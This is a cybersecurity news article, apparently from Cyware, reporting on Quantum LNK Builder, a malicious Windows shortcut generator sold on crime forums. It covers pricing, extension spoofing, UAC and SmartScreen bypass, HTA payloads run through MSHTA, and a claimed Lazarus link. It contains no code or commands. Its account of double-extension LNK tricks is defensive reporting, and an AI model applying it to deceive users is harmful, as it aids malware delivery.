A malware tool has been spotted that allows cybercriminals to create malicious Windows shortcut (.LNK) files. At present, this tool has been discovered for sale on cybercrime forums.

Quantum LNK Builder

The tool, named Quantum Lnk Builder, is available for lease at various price offers.
  • It is available for a month at €189 (approx $200), for two months at €355 (approx $375), and for six months at €899 (approx $950). Users get lifetime access for €1,500 (approx $1585).
  • The tool makes it possible to spoof any extension and choose from over 300 icons for malicious link files. Further, it even has support for UAC and Windows SmartScreen bypass.
  • Quantum Builder supports multiple payloads per LNK file and has capabilities to create HTA and ISO payloads. 
  • The earliest samples date back to May 24, which pretended to be harmless-looking text files.

Attribution

The tool shares ties with the Lazarus Group based on source code-level overlaps in the tool and modus operandi of using LNK files for spreading further stage payloads, implying potential use by APT actors.

Why LNK extensions?

  • By default, Windows OS hides the LNK extension. If a file has the name file_name[.]txt[.]lnk, then only file_name[.]txt will be shown to a user even though the ‘show file extension’ option is enabled. Due to this reason, there is a higher probability of users getting fooled into clicking this file type.
  • When the LNK files are run, they can execute PowerShell code that can be leveraged to perform further actions. In this specific case, it runs an HTML application file hosted on Quantum's website using a legitimate Windows utility that's used to run HTA files, MSHTA.

Conclusion

A dedicated tool for generating malicious LNK files indicates the increasing popularity of malicious LNK files. Moreover, several reports suggest that LNK-based attacks are getting traction among several threat groups, including Emotet, Bumblebee, Qbot, and IcedID. The availability of dedicated tools could further divert the attention of more groups toward this attack tactic in the coming future.
Cyware Publisher

Publisher

Cyware